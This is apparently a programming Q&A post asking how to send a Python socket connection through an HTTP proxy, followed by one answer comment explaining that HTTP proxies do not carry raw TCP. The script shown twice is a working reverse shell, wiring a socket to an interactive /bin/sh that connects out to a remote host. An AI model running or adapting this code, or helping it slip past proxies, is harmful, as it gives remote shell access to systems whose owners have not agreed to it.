# Using socket and an HTTP proxy in Python

Tags: python, sockets

Here's a basic script that I currently have which doesn't leverage an HTTP proxy:

```
import socket
import subprocess
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("my-test-server", 443))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```

However, this only works if my proxy is turned off. How do I configure this to use a proxy? I saw suggestion elsewhere on here, mentioning I can use the following:

```
#!/usr/bin/env python
import socket
import subprocess
import os

proxy = "http://localhost:8080"
os.environ['http_proxy'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['HTTPS_PROXY'] = proxy

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("my-test-server", 443))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```

but this didn't work of course.

Comment: You are trying to use a HTTP proxy with TCP. TCP is not HTTP, which means that you cannot simply use a proxy specific for HTTP. If you are lucky you can use a HTTPS proxy with the CONNECT command to connect to arbitrary servers and port, but most proxies will not allow this.